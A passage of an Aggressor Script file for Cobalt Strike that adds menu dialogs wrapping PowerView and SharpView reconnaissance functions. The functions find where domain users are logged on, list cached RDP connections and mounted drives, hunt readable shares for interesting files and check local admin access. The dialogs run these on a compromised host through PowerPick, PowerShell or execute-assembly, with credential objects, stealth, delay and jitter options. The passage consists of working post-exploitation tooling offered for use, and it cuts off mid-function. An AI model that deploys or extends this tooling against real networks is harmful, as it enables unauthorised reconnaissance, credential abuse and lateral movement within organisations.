                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-WMIRegLastLoggedOn via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-WMIRegLastLoggedOn'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-WMIRegLastLoggedOn via PowerShell');
            bpowershell($bid, ''.$creds.'Get-WMIRegLastLoggedOn'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-WMIRegLastLoggedOn via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-WMIRegLastLoggedOn'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the last user who logged onto the local (or a remote) machine");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}
sub getwmiregcachedrdpconnection{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-WMIRegCachedRDPConnection", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetwmiregcachedrdpconnection()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-WMIRegCachedRDPConnection via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-WMIRegCachedRDPConnection'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-WMIRegCachedRDPConnection via PowerShell');
            bpowershell($bid, ''.$creds.'Get-WMIRegCachedRDPConnection'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-WMIRegCachedRDPConnection via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-WMIRegCachedRDPConnection'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns information about RDP connections outgoing from the local (or remote) machine. Note: This function requires administrative rights on the machine you're enumerating");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getwmiregmounteddrive{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-WMIRegMountedDrive", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetwmiregmounteddrive()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-WMIRegMountedDrive via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-WMIRegMountedDrive'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-WMIRegMountedDrive via PowerShell');
            bpowershell($bid, ''.$creds.'Get-WMIRegMountedDrive'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-WMIRegMountedDrive via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-WMIRegMountedDrive'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns information about saved network mounted drives for the local (or remote) machine. Note: This function requires administrative rights on the machine you're enumerating");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getwmiprocess{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-WMIProcess", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetwmiprocess()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-WMIProcess via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-WMIProcess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-WMIProcess via PowerShell');
            bpowershell($bid, ''.$creds.'Get-WMIProcess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-WMIProcess via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-WMIProcess'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns a list of processes and their owners on the local or remote machine");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub findinterestingfile{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-InterestingFile", %(execmethod => "PowerPick", Path => "", Include => "", LastAccessTime => "", LastWriteTime => "", CreationTime => "", OfficeDocs => "false", FreshEXEs => "false", ExcludeFolders => "false", ExcludeHidden => "false", CheckWriteAccess => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpfindinterestingfile()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-InterestingFile via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-InterestingFile'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-InterestingFile via PowerShell');
            bpowershell($bid, ''.$creds.'Find-InterestingFile'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-InterestingFile via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-InterestingFile'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Searches for files on the given path that match a series of specified criteria");
    drow_text($dialog, 'Path', 'Path');
    drow_text($dialog, 'Include', 'Include');
    drow_text($dialog, 'LastAccessTime', 'LastAccessTime');
    drow_text($dialog, 'LastWriteTime', 'LastWriteTime');
    drow_text($dialog, 'CreationTime', 'CreationTime');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'OfficeDocs', 'OfficeDocs');
    drow_checkbox($dialog, 'FreshEXEs', 'FreshEXEs');
    drow_checkbox($dialog, 'ExcludeFolders', 'ExcludeFolders');
    drow_checkbox($dialog, 'ExcludeHidden', 'ExcludeHidden');
    drow_checkbox($dialog, 'CheckWriteAccess', 'CheckWriteAccess');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

#-----------------------------
#Threaded 'Meta'-Functions
#-----------------------------
sub finddomainuserlocation{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-DomainUserLocation", %(execmethod => "PowerPick", ComputerName => "", Domain => "", ComputerDomain => "", ComputerLDAPFilter => "", ComputerSearchBase => "", ComputerUnconstrained => "false", ComputerOperatingSystem => "", ComputerServicePack => "", ComputerSiteName => "", UserIdentity => "", UserDomain => "", UserLDAPFilter => "", UserSearchBase => "", UserGroupIdentity => "", UserAdminCount => "false", UserAllowDelegation => "false", CheckAccess => "false", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", StopOnSuccess => "false", Delay => "", Jitter => "", ShowAll => "false", Stealth => "false", StealthSource => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
            helpfinddomainuserlocation()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-DomainUserLocation via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-DomainUserLocation'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-DomainUserLocation via PowerShell');
            bpowershell($bid, ''.$creds.'Find-DomainUserLocation'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-DomainUserLocation via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-DomainUserLocation'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Finds domain machines where specific users are logged into");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'ComputerDomain', 'ComputerDomain');
    drow_text($dialog, 'ComputerLDAPFilter', 'ComputerLDAPFilter');
    drow_text($dialog, 'ComputerSearchBase', 'ComputerSearchBase');
    drow_text($dialog, 'ComputerOperatingSystem', 'ComputerOperatingSystem');
    drow_text($dialog, 'ComputerServicePack', 'ComputerServicePack');
    drow_text($dialog, 'ComputerSiteName', 'ComputerSiteName');
    drow_text($dialog, 'UserIdentity', 'UserIdentity');
    drow_text($dialog, 'UserDomain', 'UserDomain');
    drow_text($dialog, 'UserLDAPFilter', 'UserLDAPFilter');
    drow_text($dialog, 'UserSearchBase', 'UserSearchBase');
    drow_text($dialog, 'UserGroupIdentity', 'UserGroupIdentity');
    drow_text($dialog, 'StealthSource', 'StealthSource');
    drow_text($dialog, 'Threads', 'Threads');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_checkbox($dialog, 'ComputerUnconstrained', 'ComputerUnconstrained');
    drow_checkbox($dialog, 'UserAdminCount', 'UserAdminCount');
    drow_checkbox($dialog, 'UserAllowDelegation', 'UserAllowDelegation');
    drow_checkbox($dialog, 'CheckAccess', 'CheckAccess');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'StopOnSuccess', 'StopOnSuccess');
    drow_checkbox($dialog, 'ShowAll', 'ShowAll');
    drow_checkbox($dialog, 'Stealth', 'Stealth');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub finddomainprocess{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-DomainProcess", %(execmethod => "PowerPick", ComputerName => "", Domain => "", ComputerDomain => "", ComputerLDAPFilter => "", ComputerSearchBase => "", ComputerUnconstrained => "false", ComputerOperatingSystem => "", ComputerServicePack => "", ComputerSiteName => "", ProcessName => "", UserIdentity => "", UserDomain => "", UserLDAPFilter => "", UserSearchBase => "", UserGroupIdentity => "", UserAdminCount => "false", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", StopOnSuccess => "false", Delay => "", Jitter => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
            helpfinddomainprocess()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-DomainProcess via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-DomainProcess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-DomainProcess via PowerShell');
            bpowershell($bid, ''.$creds.'Find-DomainProcess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-DomainProcess via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-DomainProcess'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Searches for processes on the domain using WMI, returning processes that match a particular user specification or process name");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'ComputerDomain', 'ComputerDomain');
    drow_text($dialog, 'ComputerLDAPFilter', 'ComputerLDAPFilter');
    drow_text($dialog, 'ComputerSearchBase', 'ComputerSearchBase');
    drow_text($dialog, 'ComputerOperatingSystem', 'ComputerOperatingSystem');
    drow_text($dialog, 'ComputerServicePack', 'ComputerServicePack');
    drow_text($dialog, 'ComputerSiteName', 'ComputerSiteName');
    drow_text($dialog, 'ProcessName', 'ProcessName');
    drow_text($dialog, 'UserIdentity', 'UserIdentity');
    drow_text($dialog, 'UserDomain', 'UserDomain');
    drow_text($dialog, 'UserLDAPFilter', 'UserLDAPFilter');
    drow_text($dialog, 'UserSearchBase', 'UserSearchBase');
    drow_text($dialog, 'UserGroupIdentity', 'UserGroupIdentity');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_text($dialog, 'Threads', 'Threads');
    drow_checkbox($dialog, 'UserAdminCount', 'UserAdminCount');
    drow_checkbox($dialog, 'ComputerUnconstrained', 'ComputerUnconstrained');
    drow_checkbox($dialog, 'StopOnSuccess', 'StopOnSuccess');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub finddomainuserevent{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-DomainUserEvent", %(execmethod => "PowerPick", ComputerName => "", Domain => "", Filter => "", StartTime => "", EndTime => "", MaxEvents => "", UserIdentity => "", UserDomain => "", UserLDAPFilter => "", UserSearchBase => "", UserGroupIdentity => "", UserAdminCount => "false", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", StopOnSuccess => "false", Delay => "", Jitter => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
            helpfinddomainuserevent()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-DomainUserEvent via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-DomainUserEvent'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-DomainUserEvent via PowerShell');
            bpowershell($bid, ''.$creds.'Find-DomainUserEvent'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-DomainUserEvent via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-DomainUserEvent'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Finds logon events on the current (or remote domain) for the specified users");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Filter', 'Filter');
    drow_text($dialog, 'StartTime', 'StartTime');
    drow_text($dialog, 'EndTime', 'EndTime');
    drow_text($dialog, 'MaxEvents', 'MaxEvents');
    drow_text($dialog, 'UserIdentity', 'UserIdentity');
    drow_text($dialog, 'UserDomain', 'UserDomain');
    drow_text($dialog, 'UserLDAPFilter', 'UserLDAPFilter');
    drow_text($dialog, 'UserSearchBase', 'UserSearchBase');
    drow_text($dialog, 'UserGroupIdentity', 'UserGroupIdentity');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_text($dialog, 'Threads', 'Threads');
    drow_checkbox($dialog, 'UserAdminCount', 'UserAdminCount');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'StopOnSuccess', 'StopOnSuccess');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub finddomainshare{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-DomainShare", %(execmethod => "PowerPick", ComputerName => "", ComputerDomain => "", ComputerLDAPFilter => "", ComputerSearchBase => "", ComputerOperatingSystem => "", ComputerServicePack => "", ComputerSiteName => "", CheckShareAccess => "false", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", Delay => "", Jitter => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
            helpfinddomainshare()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-DomainShare via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-DomainShare'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-DomainShare via PowerShell');
            bpowershell($bid, ''.$creds.'Find-DomainShare'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-DomainShare via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-DomainShare'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'ComputerDomain', 'ComputerDomain');
    drow_text($dialog, 'ComputerLDAPFilter', 'ComputerLDAPFilter');
    drow_text($dialog, 'ComputerSearchBase', 'ComputerSearchBase');
    drow_text($dialog, 'ComputerOperatingSystem', 'ComputerOperatingSystem');
    drow_text($dialog, 'ComputerServicePack', 'ComputerServicePack');
    drow_text($dialog, 'ComputerSiteName', 'ComputerSiteName');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_text($dialog, 'Threads', 'Threads');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'CheckShareAccess', 'CheckShareAccess');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub findinterestingdomainsharefile{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-InterestingDomainShareFile", %(execmethod => "PowerPick", ComputerName => "", ComputerDomain => "", ComputerLDAPFilter => "", ComputerSearchBase => "", ComputerOperatingSystem => "", ComputerServicePack => "", ComputerSiteName => "", Include => "", SharePath => "", ExcludedShares => "", LastAccessTime => "", LastWriteTime => "", CreationTime => "", OfficeDocs => "false", FreshEXEs => "false", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", Delay => "", Jitter => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
            helpfindinterestingdomainsharefile()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-InterestingDomainShareFile via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-InterestingDomainShareFile'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-InterestingDomainShareFile via PowerShell');
            bpowershell($bid, ''.$creds.'Find-InterestingDomainShareFile'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-InterestingDomainShareFile via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-InterestingDomainShareFile'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Searches for files matching specific criteria on readable shares in the domain");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'ComputerDomain', 'ComputerDomain');
    drow_text($dialog, 'ComputerLDAPFilter', 'ComputerLDAPFilter');
    drow_text($dialog, 'ComputerSearchBase', 'ComputerSearchBase');
    drow_text($dialog, 'ComputerOperatingSystem', 'ComputerOperatingSystem');
    drow_text($dialog, 'ComputerServicePack', 'ComputerServicePack');
    drow_text($dialog, 'ComputerSiteName', 'ComputerSiteName');
    drow_text($dialog, 'Include', 'Include');
    drow_text($dialog, 'SharePath', 'SharePath');
    drow_text($dialog, 'ExcludedShares', 'ExcludedShares');
    drow_text($dialog, 'LastAccessTime', 'LastAccessTime');
    drow_text($dialog, 'LastWriteTime', 'LastWriteTime');
    drow_text($dialog, 'CreationTime', 'CreationTime');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_text($dialog, 'Threads', 'Threads');
    drow_checkbox($dialog, 'OfficeDocs', 'OfficeDocs');
    drow_checkbox($dialog, 'FreshEXEs', 'FreshEXEs');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub findlocaladminaccess{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-LocalAdminAccess", %(execmethod => "PowerPick", ComputerName => "", ComputerDomain => "", ComputerLDAPFilter => "", ComputerSearchBase => "", ComputerOperatingSystem => "", ComputerServicePack => "", ComputerSiteName => "", CheckShareAccess => "false", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", Delay => "", Jitter => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
